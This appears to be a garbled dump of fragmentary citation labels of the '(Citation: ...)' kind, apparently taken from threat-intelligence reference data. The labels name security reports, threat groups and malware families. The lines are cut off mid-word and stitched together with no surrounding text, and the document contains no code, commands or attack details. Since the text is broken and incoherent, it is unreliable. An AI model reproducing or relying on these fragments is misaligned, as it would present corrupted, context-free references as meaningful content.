SET Zebrocy May 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: US-CERT TA18-074A),(Citation: StarBlizzard),(Citation: Proo

ecember 2014),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint TA2541 Februar
hish May 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FireEye APT33 Sept 2017),(Citation: Cybereason Oceanlotus M

8),(Citation: ESET Gelsemium June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Unit 42 K
on: DFIR Conti Bazar Nov 2021),(Citation: NCSC Joint Report Public Tools),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 2019

itation: IBM TA505 April 2020),(Citation: Sophos Maze VM September 2020),(Citation: Camba RARSTONE),(Citation: Medium Metamorfo A

RAT),(Citation: OilRig New Delivery Oct 2017),(Citation: Securelist LuckyMouse June 2018),(Citation: DFIR_Quantum_Ransomware),(Citatio

ndiant Cutting Edge Part 2 January 2024),(Citation: FireEye TRITON 2019),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malwar
020),(Citation: GitHub QuasarRAT),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Mandiant Cutting Edge Part 3 February 202

vetta Winnti April 2015),(Citation: TrendMicro macOS Dacls May 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Cit
,(Citation: Novetta-Axiom),(Citation: Symantec W32.Duqu),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: FireE
24),(Citation: objsee mac malware 2017),(Citation: Mandiant No Easy Breach),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: NKAbus
URST Backdoor December 2020),(Citation: ESET Industroyer),(Citation: NCC Group Chimera January 2021),(Citation: ESET ComRAT May 20
2022),(Citation: MDSec Brute Ratel August 2022),
Citation: Cisco Talos Intelligence Group),(Citation: Group IB RTM August 2019),(Citation: CISA Scattered Spider Advisory November 2023),(
e 2017),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: FireEye FIN6 Apr 2019),(Citation: Crowdstrike GTR2020 Ma
e TTPs Dec 2017),(Citation: PsExec Russinovich),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Bleeping Computer - Ryuk W
on: Apple Unified Log Analysis Remote Login and Screen Sharing)

ereason Cobalt Kitty 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: GovCE
Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: SANS Conficker),(Cit

TeamTNT),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Nicolas Falliere, Liam O Murchu,

roissant April 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation: Symantec Daggerfly 2024),(Citation: DomainTools WinterVivern 2021)

y 2017),(Citation: McAfee Netwire Mar 2015),(Citation: PowerSploit Documentation),(Citation: Talos ROKRAT),(Citation: FireEye APT33 Sep
Zero-Day Exploitation January 2024),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye TRITON 2019),(Citation: Crowdstrike GTR

on: Trend Micro Ransomware February 2021),(Citation: Microsoft BlackCat Jun 2022),(Citation: McAfee Babuk February 2021),(Citation: F

dworm January 2021),(Citation: MacKeeper Bundlore Apr 2019),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky MoleRATs Ap
alos Zeus Panda Nov 2017),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Kaspersky WIRTE November 20

ndiant APT43 March 2024),(Citation: Cisco Operation Layover September 2021),(Citation: McAfee Lazarus Nov 2020),(Citation: Mandiant U

tion: ATT QakBot April 2021),(Citation: Group IB APT 41 June 2021),(Citation: Medium Metamorfo Apr 2020),(Citation: Unit42 Clop April 20

n: FireEye APT41 Aug 2019),(Citation: Gigamon Berserk Bear October 2021),(Citation: Talos CCleanup 2017),(Citation: FireEye SUNBURST B
18),(Citation: Unit42 Xbash Sept 2018),(Citation: Cofense RevengeRAT Feb 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cylance D
,(Citation: Cybereason Chaes Nov 2020),(Citation: Cybereason TA505 April 2019),(Citation: Latrodectus APR 2024),(Citation: RedCanary Ra

on: Security Intelligence More Eggs Aug 2019),(Citation: RedCanary Mockingbird May 2020),(Citation: Kaspersky Cloud Atlas December 201
FIR Report APT35 ProxyShell March 2022),(Citation: Unit 42 TA551 Jan 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Pa

elist BlackEnergy Nov 2014),(Citation: Secureworks Gold Prelude Profile),(Citation: Cisco CaddyWiper March 2022),(Citation: Cybereason C

g 2019),(Citation: trendmicro xcsset xcode project 2020),

icrosoft PLATINUM April 2016),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Trend Micro IXESHE 2012),(Citation: FireEye FIN6 Apr
Microsoft NICKEL December 2021),

C Cloud Hopper April 2017),(Citation: Palo Alto Comnie),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Securelist BlackEnergy Nov
ro IXESHE 2012),(Citation: Mandiant UNC3313 Feb 2022),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Symantec Dragonfly),(Citatio

Trend Micro IXESHE 2012),(Citation: Palo Alto Networks BBSRAT),(Citation: Savill 1999),(Citation: FoxIT Wocao December 2019),(Citation:

2 Oct 2021),(Citation: Group IB APT 41 June 2021),(Citation: ESET Attor Oct 2019),(Citation: CERT-FR PYSA April 2020),(Citation: Github Po

ylance Shaheen Nov 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(C

os Intelligence Group),(Citation: GitHub PoshC2),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Symantec Leafminer
endMicro Trickbot Feb 2019),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 42

ation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FireEye APT33 Sept
tation: DarkReading FireEye FIN5 Oct 2015),(Citation: ESET Industroyer),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit42 OilRig

ike Daddy May 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Ci

anoCore Jan 2017),(Citation: Group IB Silence Sept 2018),(Citation: Talos Oblique RAT March 2021),(Citation: Fidelis njRAT June 2013),(Cita
tober 2022),(Citation: Unit42 Redaman January 2019),
sekitten August 2021),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Symantec Dyre June 2015),(Citation: ESET Okrum July
oofpoint Bumblebee April 2022),(Citation: Talos Bisonal Mar 2020),(Citation: Securelist APT10 March 2021),(Citation: Secureworks DarkTor

n: ESET Crutch December 2020),(Citation: Zscaler Bazar September 2020),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Aqua
ation: Meyers Numbered Panda),(Citation: Github PowerShell Empire),(Citation: BitDefender Chafer May 2020),(Citation: F-Secure The Duk

HOPLIGHT Apr 2019),(Citation: PowerSploit Documentation),(Citation: DFIR Ryuk's Return October 2020),(Citation: Securelist MuddyWate
ay 2020),(Citation: cobaltstrike manual),(Citation: GitHub PoshC2),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: TrendMicro

ocess Token)

ant FIN12 Oct 2021),(Citation: Elastic Latrodectus May 2024),(Citation: Cybereason Valak May 2020),(Citation: Github PowerShell Empire),

(Citation: ANSSI Sandworm January 2021),(Citation: Savill 1999),(Citation: F-Secure The Dukes),(Citation: Cybereason OperationCuckooBee

Bitdefender FunnyDream Campaign November 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: Google TAG Lazarus Jan 2021),(

4),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Microsoft POLONIUM J
Group IB APT 41 June 2021),(Citation: FireEye FIN7 March 2017),(Citation: CISA GRU29155 2024),(Citation: ESET Gelsemium June 2021),(Cit

CISA AA20-301A Kimsuky),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Microsoft SIR Vol 19),(Citation: Cybereason Oceanlotus May

),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Microsoft Actinium February 2022),(Citation: ESET Gelsemium Jun
2017),(Citation: SecureWorks August 2019),(Citation: Talos ROKRAT),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)
2023),(Citation: McAfee Gold Dragon),(Citation: Symantec Dragonfly),(Citation: ESET TeleBots Oct 2018),(Citation: Unit 42 VERMIN Jan 201
: ESET Sednit Part 2),(Citation: Mandiant UNC3890 Aug 2022),(Citation: TrendMicro RawPOS April 2015),(Citation: Unit 42 OopsIE! Feb 201

eEye APT35 2018),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: ESET Lazarus Jun 2020),(Citation: Mandiant Operation
2017),(Citation: PowerSploit Documentation),(Citation: Kaspersky Flame),(Citation: EFF Manul Aug 2016),(Citation: objsee mac malware 20
2018),(Citation: Ensilo Darkgate 2018),(Citation: ESET Attor Oct 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Sentin
os Promethium June 2020),

2020),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN10 June 2017),(Citation: Trend Micro IXESHE 2012),(Citatio

on Astaroth Feb 2019),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET InvisiMole June 2020),(Citation: Securelist WhiteBear Au

t June 2020),(Citation: Microsoft Targeting Elections September 2020),(Citation: Kaspersky Turla),(Citation: Okta Block Anonymizing Servic
Aug 2022),(Citation: Securelist Machete Aug 2014),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: Korean FSI TA505 2020

dstrike DNC June 2016),(Citation: ESET Operation Spalax Jan 2021),(Citation: ESET Sednit Part 2),(Citation: ClearSky Pay2Kitten December 2

tion: Rewterz Sidewinder COVID-19 June 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Palo Alto Unit 42 OutSteel SaintBot Febru

Eye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN10 June 2017),(Citation: FireEye FIN6 Apr 2019),(Citation: Kaspersky Cloud Atla
2020),(Citation: KISA Operation Muzabi),(Citation: TrendMicro Tonto Team October 2020),(Citation: CobaltStrike Daddy May 2017),(Citati
n: Mandiant Cutting Edge January 2024),(Citation: ESET LoudMiner June 2019),(Citation: Lumen KVBotnet 2023),(Citation: Intezer Doki July
ot December 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Kaspersky Transparent Tr
nd Micro Daserf Nov 2017),(Citation: Talos PoetRAT October 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Zscaler APT31 Covid-1

Aug 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Proofpoint TA505 Jan 2019),
tion: TrendMicro Lazarus Nov 2018),(Citation: ESET Carbon Mar 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Un
021),(Citation: Visa FIN6 Feb 2019),(Citation: Symantec Leafminer July 2018),(Citation: Symantec Daggerfly 2023),(Citation: Segurança Infor

ation: IBM IcedID November 2017),(Citation: Citizen Lab Group5),(Citation: XAgentOSX 2017),(Citation: Bitdefender Agent Tesla April 2020

verride 2017),(Citation: Unit 42 WhisperGate January 2022),(Citation: Unit 42 Kazuar May 2017),(Citation: AcidRain JAGS 2022),(Citation: V

Trooper May 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Unit 42 C0d0
List Bad Rabbit),(Citation: FireEye FiveHands April 2021),(Citation: Cybereason Egregor Nov 2020),(Citation: CarbonBlack RobbinHood May

ic Octopus 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET Machete July 2019),(Citation: ESET Zebrocy Nov 2018),(Citation

nd Micro IXESHE 2012),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: ANSSI Sandworm January 2021),(Citation: Cyberse

June 2020),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ESET InvisiMole June 2020),(Citation: Palo Alto Rover),
tion: Microsoft Actinium February 2022),(Citation: ESET Gelsemium June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake M

ov 22),(Citation: Mandiant FIN13 Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Mandiant APT43 March 2024),(Citation: Trend M

e Shamoon Nov 2016),(Citation: Unit42 Agrius 2023),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Crowdstrike DriveS
tdefender FIN8 July 2021),(Citation: PowerSploit Documentation),(Citation: Cyberreason Anchor December 2019),(Citation: Red Canary Ho

itation: ESET EvasivePanda 2024),(Citation: Volexity Patchwork June 2018),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Securelist S

Ursnif Aug 2016),(Citation: Cisco Umbrella DGA Brute Force),(Citation: Cybereason Dissecting DGAs),(Citation: Akamai DGA Mitigation)

ch 2022),(Citation: Mandiant APT29 Microsoft 365 2022),(Citation: TrustedSec OOB Communications)

lset May 2024),(Citation: Mandiant APT41),(Citation: ESET ComRAT May 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: M
mber 2014),(Citation: Recorded Future REDDELTA July 2020),(Citation: FireEye APT30),(Citation: Carbon Black HotCroissant April 2020),(Cit

d August 2022),
urn October 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: hexed osx.dok analysis 2019),(Citation: Trend Micro FIN6 October 20
2021),(Citation: Latrodectus APR 2024),(Citation: Cylance Dust Storm),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Nicolas Falliere, Lia

Zscaler APT31 Covid-19 October 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: MSTIC Octo Tempest Operations October 2

mber 2021),(Citation: Volexity Ivanti Global Exploitation January 2024),(Citation: Rostovcev APT41 2021),(Citation: KISA Operation Muzabi
: Talos Frankenstein June 2019),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Sec

tation: Microsoft SIR Vol 21),(Citation: Microsoft SIR Vol 19),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation:
tion: FireEye APT28 Hospitality Aug 2017),(Citation: ClearSky Pay2Kitten December 2020),(Citation: CrowdStrike Carbon Spider August 202
rsecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Cisco Talos Intelligence Group),(Citation: CrowdStrike StellarParticle Jan
n: Securelist MiniDuke Feb 2013),(Citation: Proofpoint Bumblebee April 2022),(Citation: FireEye APT30),(Citation: Novetta Blockbuster RAT
017),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: Secureworks GandCrab and REvil September 2
paign November 2020),(Citation: Lazarus APT January 2022),(Citation: Kaspersky LuminousMoth July 2021),(Citation: Unit 42 Rocke January

Kimsuky Nov 2021),(Citation: Telefonica Snip3 December 2021),(Citation: TrendMicro BlackTech June 2017),(Citation: McAfee Cuba April 2

2020),(Citation: PowerSploit Documentation),(Citation: FireEye FIN7 Oct 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Symante
Check Logs October 2023),(Citation: FireEye Clandestine Fox),(Citation: Symantec Daggerfly 2023),(Citation: PTSecurity Higaisa 2020),(Cita
ERT TA18-074A),(Citation: Zscaler Kasidet),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: DFIR
Shell March 2022),(Citation: Huntress INC Ransomware May 2024),(Citation: Talos Promethium June 2020),(Citation: CarbonBlack RobbinH

er December 2018),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Unit42 Agrius 20

Citation: US-CERT TA18-074A),(Citation: FinFisher Citation),(Citation: FireEye APT38 Oct 2018),(Citation: GitHub Pupy),(Citation: SentinelOn
on: Mandiant APT1 Appendix),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Fi

Empire),(Citation: Sandfly BPFDoor 2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: FireEye TRITON 2019),(Citation

017),(Citation: ESET Industroyer),(Citation: Mandiant APT41),(Citation: Trend Micro Qakbot May 2020),(Citation: Secureworks Gold Prelude
2023),(Citation: Palo Alto Unit 42 EKANS),(Citation: CERT-FR PYSA April 2020),(Citation: LogRhythm WannaCry),(Citation: SecureWorks W

ug 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Netscout Stolen Pencil Dec 2018),(Cita

ASR Nov 2017),(Citation: Microsoft ADV170021 Dec 2017),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: BleepingComputer DDE
ation: SentinelOne Aoqin Dragon June 2022),(Citation: SentinelOne Agrius 2021),(Citation: CheckPoint Agrius 2023),(Citation: DFIR Conti B

2020),(Citation: Cisco Talos Intelligence Group),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Prevailion

September 2020),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023
TA July 2020),(Citation: Proofpoint TA2541 February 2022),(Citation: ClearSky Lazarus Aug 2020),(Citation: Kaspersky Transparent Tribe Au

up WastedLocker June 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Palo Alto Networks

(Citation: CrowdStrike Ryuk January 2019),(Citation: cobaltstrike manual),(Citation: ClearSky Lazarus Aug 2020),(Citation: Fortinet Diavol Ju

Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: Invincea XTunnel),(C
pe March 2018),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Kersten Akira 2023),(Citation: Group IB APT 41 June 2021),(Citation: Elas

SET Gelsemium June 2021),(Citation: ESET PipeMon May 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: Joint Cybersecurity
tion: Securelist DarkVishnya Dec 2018),(Citation: FireEye TRITON 2019),(Citation: Group IB Silence Sept 2018),(Citation: FoxIT Wocao Decem
itation: win10_asr),(Citation: Microsoft Securing Privileged Access),(Citation: Microsoft LSA)

tion: TrueSec Gsecdump),(Citation: NCC Group APT15 Alive and Strong),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: FireEye APT34
e APT35 2018),(Citation: FireEye APT40 March 2019),(Citation: Talos Nyetya June 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation:
038A PRC Critical Infrastructure February 2024),(Citation: Cycraft Chimera April 2020),(Citation: Microsoft NICKEL December 2021),(Citatio

Pentest-Script),(Citation: US-CERT TA18-074A),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: US-CERT HOP
ly 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Unit 42 OilRig Sept 2018),(Citation: Sym
20),(Citation: ESET Sednit Part 2),(Citation: Mandiant FIN7 Apr 2022),(Citation: Group IB GrimAgent July 2021),(Citation: FinFisher Citation),
2021),(Citation: Talos PoetRAT October 2020),(Citation: Cisco Talos Avos Jun 2022),(Citation: CISA AA20-259A Iran-Based Actor September

ay 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: FireEye APT19),(Citation: ESET Sednit Part 1),(Citation: Medium Metamorfo Apr
y 2019),(Citation: Symantec Volgmer Aug 2014),(Citation: CISA ComRAT Oct 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Pro

on: Trend Micro TeamTNT),(Citation: Cylance Shaheen Nov 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Mandiant APT41

tation: NCSC Joint Report Public Tools),(Citation: Mandiant No Easy Breach),(Citation: Secureworks COBALT DICKENS September 2019),(Cit

elis njRAT June 2013),(Citation: Prevailion DarkWatchman 2021),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: ESET Sedn
tation: TechNet Dsquery),(Citation: US-CERT TA18-074A),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: FireEye Ry
fpoint TA505 Mar 2018),(Citation: Palo Alto OilRig May 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ClearSky Lebanese Cedar Jan

n: StarBlizzard),(Citation: Proofpoint TA407 September 2019),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Certfa Charm

n: Proofpoint TA2541 February 2022),(Citation: Recorded Future REDDELTA July 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Gro
tion: Cybereason Oceanlotus May 2017),(Citation: Google Election Threats October 2020),(Citation: Mandiant No Easy Breach),(Citation: C

May 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Skidmap),(Citation: Arxiv Avaddon Feb 2021),(Citation: Kaspersky Sh
tion: FireEye APT41 Aug 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: ESET Gazer Aug 2017),(Citation: TrendMicro Lazarus N

Citation: Medium Metamorfo Apr 2020),(Citation: US-CERT Emotet Jul 2018),(Citation: ESET Gelsemium June 2021),(Citation: ESET PipeMo

uantum_Ransomware),(Citation: SentinelOne Gootloader June 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Malwarebytes Sm

sory AA23-129A Snake Malware May 2023),(Citation: Dragos Crashoverride 2017),(Citation: cobaltstrike manual),(Citation: Bitdefender Fun
tting Edge Part 3 February 2024),(Citation: Check Point Warzone Feb 2020),(Citation: FRP GitHub),(Citation: Checkpoint Dridex Jan 2021),(C

module Whitepaper 2021),(Citation: Reaqta MuddyWater November 2017),(Citation: ESET InvisiMole June 2020),(Citation: ESET InvisiMole
dix Sept 2022),(Citation: FireEye APT39 Jan 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Kaspersky
4 Dec 2014),(Citation: NKAbuse SL),(Citation: Dingledine Tor The Second-Generation Onion Router),(Citation: CISA AA21-200A APT40 July
Citation: ESET ComRAT May 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citatio

er Advisory November 2023),(Citation: Securelist Kimsuky Sept 2013),(Citation: FireEye CARBANAK June 2017),(Citation: Cisco Talos Avos J
tion: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye TRITON 2019),(Citation: BitDefender Chafer May 2020),(Citation: RedCanary Mock
n: Bleeping Computer - Ryuk WoL),(Citation: Alperovitch 2014),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Dell

M Mar 2021),(Citation: GovCERT Carbon May 2016),(Citation: Talos Olympic Destroyer 2018),(Citation: Cybereason Bumblebee August 202
(Citation: SANS Conficker),(Citation: Trend Micro njRAT 2018),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: Bitdefender LuminousM

colas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Anomali Rocke March 2019),(Citation: Prevx Carberp March 2011),(Cita

mainTools WinterVivern 2021),(Citation: PowerSploit Documentation),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cybere

T),(Citation: FireEye APT33 Sept 2017),(Citation: Cybereason Chaes Nov 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Kaspe
19),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FoxIT Wocao December 2019),(Citation: Cybereason OperationCuckooBees May 2

uk February 2021),(Citation: Fortinet Diavol July 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: CarbonBlack Conti July 20

ation: Kaspersky MoleRATs April 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Sekoia Raccoon1 2022),(Citation: Sekoia Racco
aspersky WIRTE November 2021),(Citation: Cylance Shaheen Nov 2018),(Citation: Talos Promethium June 2020),(Citation: Palo Alto Comni

ov 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Korean FSI TA505 2020),(Citati

(Citation: Unit42 Clop April 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: ESET EvasivePanda 2024),(Citation: CISA A

Citation: FireEye SUNBURST Backdoor December 2020),(Citation: OWASP Top 10)

Nov 2021),(Citation: Cylance Dust Storm),(Citation: fsecure NanHaiShu July 2016),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Github
2024),(Citation: RedCanary RaspberryRobin 2022),(Citation: Unit42 Molerat Mar 2020),(Citation: Sophos Ragnar May 2020),(Citation: Forti

sky Cloud Atlas December 2014),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Lab52 WIRTE Apr 2019),(Citation: Proofpoint Leviathan
ooper May 2020),(Citation: Palo Alto Comnie),(Citation: Volexity Exchange Marauder March 2021),(Citation: Netskope Squirrelwaffle Oct 2

2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: RotaJakiro 2021 netlab360 analysis),(Cit

2),(Citation: FireEye FIN6 Apr 2019),(Citation: DFIR_Quantum_Ransomware),(Citation: Unit 42 QUADAGENT July 2018),(Citation: CrowdStr

on: Securelist BlackEnergy Nov 2014),(Citation: NCC Group Chimera January 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: ESE
: Symantec Dragonfly),(Citation: ClearSky Lazarus Aug 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Kaspersky Transpar

ao December 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Cyble Black Basta May 2022),(Citation: Cisco Talos I

pril 2020),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: RedCanary Mockingbird May 2020),(Citation: G

oup Chimera January 2021),(Citation: GovCERT Carbon May 2016),(Citation: ESET Zebrocy Nov 2018),(Citation: DigiTrust Agent Tesla Jan 2

Citation: Symantec Leafminer July 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Mandiant_UNC2165),(Citation: Netscout Stolen
s April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint TA2541 February 2022),(Citation: Recorded Future REDDELTA

(Citation: FireEye APT33 Sept 2017),(Citation: Google Election Threats October 2020),(Citation: Cylance Dust Storm),(Citation: Latrodectus
2019),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT33 Guardrail),(Citation: Mandiant FIN12 Oct 2021),(Citation: CISA AA2

re Spotlight Play July 2023),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: FireEye Shamoon Nov 2016),(Ci

Fidelis njRAT June 2013),(Citation: Zscaler Cobian Aug 2017),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Un

15),(Citation: ESET Okrum July 2019),(Citation: Talos Oblique RAT March 2021),(Citation: Unit 42 WhisperGate January 2022),(Citation: Uni
Citation: Secureworks DarkTortilla Aug 2022),(Citation: Group IB GrimAgent July 2021),(Citation: Kaspersky QakBot September 2021),(Citati

erats Dec 2020),(Citation: Aqua TeamTNT August 2020),(Citation: FireEye NETWIRE March 2019),(Citation: ESET EvasivePanda 2024),(Citati
20),(Citation: F-Secure The Dukes),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Lazarus APT January 2022),(Citation: Unit 42 Kazuar M

tation: Securelist MuddyWater Oct 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Mandiant No Easy Breach),(Citation: FireEye APT
ct 2017),(Citation: TrendMicro EarthLusca 2022),(Citation: Arxiv Avaddon Feb 2021),(Citation: Uptycs Warzone UAC Bypass November 202

n: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: FoxIT Wocao December 2019),(Citation: Cybereason OperationCu

bereason OperationCuckooBees May 2022),(Citation: Symantec Buckeye),(Citation: Morphisec ShellTea June 2019),(Citation: Unit 42 Kazua

oogle TAG Lazarus Jan 2021),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Recorded Future REDDELTA July 202

tation: Microsoft POLONIUM June 2022),

SET Gelsemium June 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation:

: Cybereason Oceanlotus May 2017),(Citation: Symantec Remsec IOCs),(Citation: PWC Yellow Liderc 2023),(Citation: Unit 42 BadPatch Oct

(Citation: ESET Gelsemium June 2021),(Citation: NGLite Trojan),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 202
Infrastructure February 2024),(Citation: Red Canary NETWIRE January 2020),(Citation: Symantec W32.Duqu),(Citation: CheckPoint Naikon
ation: Unit 42 VERMIN Jan 2018),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Sekoia Raccoon2 2022),(Citation: Symant
ation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Symantec W32.Duqu),(Citation: McAfee Sharpshooter Dec

Citation: Mandiant Operation Ke3chang November 2014),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Secureworks
tation: objsee mac malware 2017),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Unit 42 Nokki Oct 2018),(Citation: Palo Alto T9000 F
ON June 2017),(Citation: SentinelOne Valak June 2020),(Citation: Eset Ramsay May 2020),(Citation: FoxIT Wocao December 2019),(Citation

nd Micro IXESHE 2012),(Citation: Mandiant UNC3313 Feb 2022),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Kaspersky Mo

ation: Securelist WhiteBear Aug 2017),(Citation: ESET GreyEnergy Oct 2018),(Citation: Palo Alto Comnie),(Citation: UCF STIG Symbolic Links

